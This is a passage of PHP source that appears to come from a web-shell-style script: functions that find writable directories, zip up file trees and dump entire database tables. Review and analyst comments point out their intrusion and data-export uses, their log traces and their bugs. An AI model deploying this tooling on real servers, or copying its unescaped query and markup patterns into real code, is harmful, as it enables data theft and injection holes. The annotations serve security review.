 * Read a php.ini directive and present it as 'Yes', 'No' or its raw value.
 *
 * NOTE(review): both comparisons are loose (==). get_cfg_var() returns false
 * for an unknown directive, which compares equal to 0 and is shown as 'No'.
 * On PHP versions before 8 a non-numeric string also compares equal to 0, so
 * a text-valued directive would be shown as 'No' there. Confirm against the
 * PHP version in use.
 *
 * @param string $varname Directive name.
 * @return mixed 'No', 'Yes', or the configured value.
 */
function getcfg($varname) {
    $result = get_cfg_var($varname);
    if ($result == 0) {
        return 'No';
    } elseif ($result == 1) {
        return 'Yes';
    } else {
        return $result;
    }
}
/**
 * Report whether a function is available in this PHP runtime.
 *
 * @param string $funName Function name to look up.
 * @return string 'Yes' when function_exists() is true, otherwise 'No'.
 */
function getfun($funName) {
    if (function_exists($funName)) {
        return 'Yes';
    }
    return 'No';
}
/**
 * Walk a directory tree and collect every sub-directory that is writable
 * by the PHP process.
 *
 * Results accumulate in the global $dirdata, indexed by the global counter
 * $j (started at 1). File names are stored relative to the global $nowpath.
 *
 * Analyst note: this is a search for writable locations under the web
 * root. Directories it reports are where tightening ownership and
 * permissions for the web-server account matters most.
 *
 * NOTE(review): the recursion descends into every directory with no depth
 * limit visible here, and the readdir() loop ends at the first entry whose
 * name is falsy (e.g. "0").
 *
 * @param string $dir Directory to scan.
 * @return array The global $dirdata after the scan, or an empty array when
 *               $dir cannot be opened.
 */
function GetList($dir) {
    global $dirdata, $j, $nowpath;
    // Initialise the shared index on first use.
    !$j && $j = 1;
    if ($dh = opendir($dir)) {
        while ($file = readdir($dh)) {
            $f = str_replace('//', '/', $dir . '/' . $file);
            if ($file != '.' && $file != '..' && is_dir($f)) {
                if (is_writable($f)) {
                    $dirdata[$j]['filename'] = str_replace($nowpath, '', $f);
                    $dirdata[$j]['mtime'] = @date('Y-m-d H:i:s', filemtime($f));
                    $dirdata[$j]['dirchmod'] = getChmod($f);
                    $dirdata[$j]['dirperm'] = getPerms($f);
                    $dirdata[$j]['dirlink'] = ue($dir);
                    $dirdata[$j]['server_link'] = $f;
                    $dirdata[$j]['client_link'] = ue($f);
                    $j++;
                }
                // Recurse whether or not this directory itself was writable.
                GetList($f);
            }
        }
        closedir($dh);
        clearstatcache();
        return $dirdata;
    } else {
        return array();
    }
}
/**
 * Run a SQL statement and classify the outcome.
 *
 * NOTE(review): $error is assigned but never used, and the final
 * `return 0` cannot be reached because every branch above it returns.
 * mysql_query() belongs to the extension removed in PHP 7.
 *
 * @param string $sql Statement text, sent as-is.
 * @return int 0 when the query failed, 1 when it produced a result
 *             resource, 2 when it succeeded without one.
 */
function qy($sql) {
    $res = $error = '';
    if (!$res = @mysql_query($sql)) {
        return 0;
    } else if (is_resource($res)) {
        return 1;
    } else {
        return 2;
    }
    return 0;
}
/**
 * Send a SQL statement on the default connection with warnings suppressed.
 *
 * The statement text is passed through unchanged; callers in this file
 * build it by string interpolation.
 *
 * @param string $sql Statement text.
 * @return mixed Whatever mysql_query() returns.
 */
function q($sql) {
    return @mysql_query($sql);
}
/**
 * Release the memory held by a query result.
 *
 * @param resource $qy Result resource from q().
 */
function fr($qy) {
    mysql_free_result($qy);
}
/**
 * Format a byte count with a G / M / K / B suffix, rounded to two decimals.
 *
 * A unit is used only when the size is strictly greater than its
 * threshold, so exactly 1024 is shown as "1024 B".
 *
 * @param int|float $size Size in bytes.
 * @return string Human-readable size, e.g. "1.5 K".
 */
function sizecount($size) {
    // Ordered from largest to smallest so the first match is the right unit.
    $units = array(
        ' G' => 1073741824,
        ' M' => 1048576,
        ' K' => 1024,
    );
    foreach ($units as $suffix => $divisor) {
        if ($size > $divisor) {
            return round($size / $divisor * 100) / 100 . $suffix;
        }
    }
    return $size . ' B';
}
/**
 * Minimal in-memory ZIP writer (deflate through gzcompress()).
 *
 * The constructor reads the given files and leaves the finished archive
 * bytes in $out.
 *
 * Analyst notes:
 *  - This class lets the script bundle files or whole directory trees into
 *    a single archive. Large archive-sized responses from a PHP script that
 *    normally serves pages are worth a look in egress or access logs.
 *  - addFile() uses eval() to turn a hex string into four bytes. The
 *    evaluated text is built from dechex() output only, but eval() in an
 *    uploaded or unknown PHP file is itself a review flag.
 *
 * NOTE(review): the constructor has the PHP 4 style (a method named like
 * the class), which PHP 8 no longer treats as a constructor.
 */
class PHPZip {
    // Finished archive bytes, filled by the constructor.
    var $out = '';
    /**
     * Collect files and build the archive.
     *
     * @param array|string $dir List of file paths, or a directory to walk.
     */
    function PHPZip($dir) {
        if (@function_exists('gzcompress')) {
            $curdir = getcwd();
            if (is_array($dir)) $filelist = $dir;
            else {
                $filelist = $this->GetFileList($dir);
                // Append each path again with the "$dir/" prefix cut off; these
                // relative names resolve after the chdir() below.
                foreach ($filelist as $k => $v) $filelist[] = substr($v, strlen($dir) + 1);
            }
            if ((!empty($dir)) && (!is_array($dir)) && (file_exists($dir))) chdir($dir);
            else chdir($curdir);
            if (count($filelist) > 0) {
                foreach ($filelist as $filename) {
                    if (is_file($filename)) {
                        $fd = fopen($filename, 'r');
                        $content = @fread($fd, filesize($filename));
                        fclose($fd);
                        // For an explicit file list, store entries by base name only.
                        if (is_array($dir)) $filename = basename($filename);
                        $this->addFile($content, $filename);
                    }
                }
                $this->out = $this->file();
                chdir($curdir);
            }
            return 1;
        } else return 0;
    }
    /**
     * Recursively list every entry below a directory.
     *
     * NOTE(review): the result accumulates in a static variable, so it is
     * shared by all calls during the request and is never reset here.
     *
     * @param string $dir Directory to walk.
     * @return array|null Paths collected so far (null if nothing was added).
     */
    function GetFileList($dir) {
        static $a;
        if (is_dir($dir)) {
            if ($dh = opendir($dir)) {
                while ($file = readdir($dh)) {
                    if ($file != '.' && $file != '..') {
                        $f = $dir . '/' . $file;
                        if (is_dir($f)) $this->GetFileList($f);
                        $a[] = $f;
                    }
                }
                closedir($dh);
            }
        }
        return $a;
    }
    // Local file records (header + data), one string per added file.
    var $datasec = array();
    // Central directory records, one string per added file.
    var $ctrl_dir = array();
    // End-of-central-directory signature followed by two zeroed 16-bit fields.
    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
    // Offset of the next local file record within the archive.
    var $old_offset = 0;
    /**
     * Pack a Unix timestamp into the 32-bit DOS date/time layout.
     *
     * @param int $unixtime Timestamp; 0 means "now".
     * @return int Packed value; dates before 1980 are clamped to 1980-01-01 00:00:00.
     */
    function unix2DosTime($unixtime = 0) {
        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
        if ($timearray['year'] < 1980) {
            $timearray['year'] = 1980;
            $timearray['mon'] = 1;
            $timearray['mday'] = 1;
            $timearray['hours'] = 0;
            $timearray['minutes'] = 0;
            $timearray['seconds'] = 0;
        }
        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
    }
    /**
     * Add one file to the archive being built.
     *
     * @param string $data File content.
     * @param string $name Entry name; backslashes are turned into '/'.
     * @param int    $time Unix timestamp for the entry; 0 means "now".
     */
    function addFile($data, $name, $time = 0) {
        $name = str_replace('\\', '/', $name);
        $dtime = dechex($this->unix2DosTime($time));
        // Reorder the hex digits into little-endian "\x.." escapes.
        // NOTE(review): indexes 0..7 assume dechex() returned eight digits.
        $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1];
        // eval() expands the escapes into raw bytes; the input is hex digits only.
        eval('$hexdtime = "' . $hexdtime . '";');
        // Local file header: signature, version needed, flags, method 8 (deflate), time.
        $fr = "\x50\x4b\x03\x04";
        $fr.= "\x14\x00";
        $fr.= "\x00\x00";
        $fr.= "\x08\x00";
        $fr.= $hexdtime;
        $unc_len = strlen($data);
        $crc = crc32($data);
        $zdata = gzcompress($data);
        // NOTE(review): the length is taken before the next line removes 2 leading
        // and 4 trailing bytes, so the recorded compressed size is 6 bytes larger
        // than the data actually stored.
        $c_len = strlen($zdata);
        // Strip the zlib wrapper to leave the raw deflate stream.
        $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
        $fr.= pack('V', $crc);
        $fr.= pack('V', $c_len);
        $fr.= pack('V', $unc_len);
        $fr.= pack('v', strlen($name));
        $fr.= pack('v', 0);
        $fr.= $name;
        $fr.= $zdata;
        // CRC and sizes are repeated after the data.
        $fr.= pack('V', $crc);
        $fr.= pack('V', $c_len);
        $fr.= pack('V', $unc_len);
        $this->datasec[] = $fr;
        $new_offset = strlen(implode('', $this->datasec));
        // Matching central directory record.
        $cdrec = "\x50\x4b\x01\x02";
        $cdrec.= "\x00\x00";
        $cdrec.= "\x14\x00";
        $cdrec.= "\x00\x00";
        $cdrec.= "\x08\x00";
        $cdrec.= $hexdtime;
        $cdrec.= pack('V', $crc);
        $cdrec.= pack('V', $c_len);
        $cdrec.= pack('V', $unc_len);
        $cdrec.= pack('v', strlen($name));
        $cdrec.= pack('v', 0);
        $cdrec.= pack('v', 0);
        $cdrec.= pack('v', 0);
        $cdrec.= pack('v', 0);
        $cdrec.= pack('V', 32);
        // Offset of this entry's local header, then advance for the next entry.
        $cdrec.= pack('V', $this->old_offset);
        $this->old_offset = $new_offset;
        $cdrec.= $name;
        $this->ctrl_dir[] = $cdrec;
    }
    /**
     * Assemble the complete archive.
     *
     * @return string Local records, central directory and end-of-directory record.
     */
    function file() {
        $data = implode('', $this->datasec);
        $ctrldir = implode('', $this->ctrl_dir);
        return $data . $ctrldir . $this->eof_ctrl_dir . pack('v', sizeof($this->ctrl_dir)) . pack('v', sizeof($this->ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
    }
}
/**
 * Write a SQL dump of one table: DROP/CREATE statements followed by one
 * INSERT per row.
 *
 * Output goes to the file handle $fp when it is truthy, otherwise it is
 * echoed to the response.
 *
 * Analyst note: this is the bulk data-export path of the script. A web
 * request that returns, or writes under the web root, a long run of
 * "INSERT INTO ... VALUES(" lines is the trace it leaves.
 *
 * NOTE(review):
 *  - $table is interpolated into every statement without quoting.
 *  - $index is never initialised before it is indexed.
 *  - each() was removed in PHP 8, implode() is called with the legacy
 *    (array, separator) argument order, and mysql_* was removed in PHP 7.
 *  - Defaults are emitted only when !empty(), so a default of "0" is dropped.
 *
 * @param string       $table Table name.
 * @param resource|int $fp    Open file handle, or 0 to echo the dump.
 */
function sqldumptable($table, $fp = 0) {
    $tabledump = "DROP TABLE IF EXISTS $table;\n";
    $tabledump.= "CREATE TABLE $table (\n";
    $firstfield = 1;
    // Column definitions.
    $fields = q("SHOW FIELDS FROM $table");
    while ($field = mysql_fetch_array($fields)) {
        if (!$firstfield) {
            $tabledump.= ",\n";
        } else {
            $firstfield = 0;
        }
        $tabledump.= " $field[Field] $field[Type]";
        if (!empty($field["Default"])) {
            $tabledump.= " DEFAULT '$field[Default]'";
        }
        if ($field['Null'] != "YES") {
            $tabledump.= " NOT NULL";
        }
        if ($field['Extra'] != "") {
            $tabledump.= " $field[Extra]";
        }
    }
    fr($fields);
    // Group index columns by key name; unique keys are tagged with a "UNIQUE|" prefix.
    $keys = q("SHOW KEYS FROM $table");
    while ($key = mysql_fetch_array($keys)) {
        $kname = $key['Key_name'];
        if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
            $kname = "UNIQUE|$kname";
        }
        if (!is_array($index[$kname])) {
            $index[$kname] = array();
        }
        $index[$kname][] = $key['Column_name'];
    }
    fr($keys);
    while (list($kname, $columns) = @each($index)) {
        $tabledump.= ",\n";
        $colnames = implode($columns, ",");
        if ($kname == "PRIMARY") {
            $tabledump.= " PRIMARY KEY ($colnames)";
        } else {
            // The "UNIQUE|" tag is removed again, so unique keys are written as plain KEY.
            if (substr($kname, 0, 6) == "UNIQUE") {
                $kname = substr($kname, 7);
            }
            $tabledump.= " KEY $kname ($colnames)";
        }
    }
    $tabledump.= "\n);\n\n";
    if ($fp) {
        fwrite($fp, $tabledump);
    } else {
        echo $tabledump;
    }
    // Row data: one INSERT statement per row, emitted as soon as it is built.
    $rows = q("SELECT * FROM $table");
    $numfields = mysql_num_fields($rows);
    while ($row = mysql_fetch_array($rows)) {
        $tabledump = "INSERT INTO $table VALUES(";
        $fieldcounter = - 1;
        $firstfield = 1;
        while (++$fieldcounter < $numfields) {
            if (!$firstfield) {
                $tabledump.= ", ";
            } else {
                $firstfield = 0;
            }
            if (!isset($row[$fieldcounter])) {
                $tabledump.= "NULL";
            } else {
                $tabledump.= "'" . mysql_escape_string($row[$fieldcounter]) . "'";
            }
        }
        $tabledump.= ");\n";
        if ($fp) {
            fwrite($fp, $tabledump);
        } else {
            echo $tabledump;
        }
    }
    fr($rows);
    if ($fp) {
        fwrite($fp, "\n");
    } else {
        echo "\n";
    }
}
/**
 * Short alias for urlencode().
 *
 * @param string $str Text to encode.
 * @return string URL-encoded text.
 */
function ue($str) {
    $encoded = urlencode($str);
    return $encoded;
}
/**
 * Print a string followed by a newline.
 *
 * The string is written unchanged; no escaping happens here.
 *
 * @param string $str Text or markup to output.
 */
function p($str) {
    echo $str, "\n";
}
/**
 * Print the opening tag of a full-width layout table.
 */
function tbhead() {
    $openTag = '<table width="100%" border="0" cellpadding="4" cellspacing="0">';
    p($openTag);
}
/**
 * Print the closing tag that matches tbhead().
 */
function tbfoot() {
    $closeTag = '</table>';
    p($closeTag);
}
/**
 * Print a hidden form field whose id and name are both $name.
 *
 * Neither argument is HTML-escaped before being placed in the attributes.
 *
 * @param string $name  Field name and id.
 * @param string $value Field value.
 */
function makehide($name, $value = '') {
    $field = '<input id="' . $name . '" type="hidden" name="' . $name . '" value="' . $value . '" />';
    p($field);
}
/**
 * Print an <input> element described by an options array.
 *
 * Keys read: size, extra, type, title, class, newline, name, value.
 * Missing keys are read directly (no isset check), which raises
 * undefined-index notices on PHP versions that report them.
 *
 * NOTE(review): every value is interpolated into the markup without
 * htmlspecialchars(), including 'value', which callers in this file fill
 * from request variables.
 *
 * @param array $arg Field options.
 */
function makeinput($arg = array()) {
    // Default width is 100 characters.
    $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
    $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
    !$arg['type'] && $arg['type'] = 'text';
    $arg['title'] = $arg['title'] ? $arg['title'] . '<br />' : '';
    $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
    // 'newline' wraps the field in its own paragraph.
    if ($arg['newline']) {
        p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
    } else {
        p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
    }
}
/**
 * Print a <select> element described by an options array.
 *
 * Keys read: onchange, title, newline, name, option (value => label map),
 * selected.
 *
 * NOTE(review): $onchange is only assigned when 'onchange' is set, yet it
 * is always interpolated, so it is an undefined variable otherwise. The
 * selected test uses a loose ==, and no value is HTML-escaped.
 *
 * @param array $arg Field options.
 */
function makeselect($arg = array()) {
    if ($arg['onchange']) {
        $onchange = 'onchange="' . $arg['onchange'] . '"';
    }
    $arg['title'] = $arg['title'] ? $arg['title'] : '';
    if ($arg['newline']) p('<p>');
    p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
    if (is_array($arg['option'])) {
        foreach ($arg['option'] as $key => $value) {
            if ($arg['selected'] == $key) {
                p("<option value=\"$key\" selected>$value</option>");
            } else {
                p("<option value=\"$key\">$value</option>");
            }
        }
    }
    p("</select>");
    if ($arg['newline']) p('</p>');
}
/**
 * Print an opening <form> tag and, optionally, a heading.
 *
 * Keys read: method (default 'post'), action, target, name (default
 * 'form1'), title.
 *
 * NOTE(review): the default for 'action' is $self, but $self is not
 * declared global in this function, so it is an undefined local and the
 * action attribute ends up empty (the form then posts to the current URL).
 *
 * @param array $arg Form options.
 */
function formhead($arg = array()) {
    !$arg['method'] && $arg['method'] = 'post';
    !$arg['action'] && $arg['action'] = $self;
    $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
    !$arg['name'] && $arg['name'] = 'form1';
    p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
    if ($arg['title']) {
        p('<h2>' . $arg['title'] . ' »</h2>');
    }
}
/**
 * Print a <textarea> inside a paragraph.
 *
 * Keys read: cols (default 100), rows (default 25), title, name, extra,
 * value.
 *
 * NOTE(review): 'value' is written between the textarea tags without
 * htmlspecialchars(), so content containing "</textarea>" ends the element early.
 *
 * @param array $arg Field options.
 */
function maketext($arg = array()) {
    !$arg['cols'] && $arg['cols'] = 100;
    !$arg['rows'] && $arg['rows'] = 25;
    $arg['title'] = $arg['title'] ? $arg['title'] . '<br />' : '';
    p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
}
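/**
 * Print a submit button and close the form.
 *
 * The id attribute used to be written with \" inside a single-quoted
 * string, where the backslash is literal, so the emitted markup read
 * id=\"submit\". The attribute is now quoted normally.
 *
 * @param string $name Name and id of the submit button; defaults to 'submit'.
 */
function formfooter($name = '') {
    if (!$name) {
        $name = 'submit';
    }
    p('<p><input class="bt" name="' . $name . '" id="' . $name . '" type="submit" value="Submit"></p>');
    p('</form>');
}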
/**
 * Close a form without printing a submit button.
 */
function formfoot() {
    $closeTag = '</form>';
    p($closeTag);
}
/**
 * Dump a value with print_r() inside a <pre> block.
 *
 * @param mixed $a Value to display.
 */
function pr($a) {
    // Capture the dump as a string so the block is emitted in one statement.
    $dump = print_r($a, true);
    echo '<pre>' . $dump . '</pre>';
}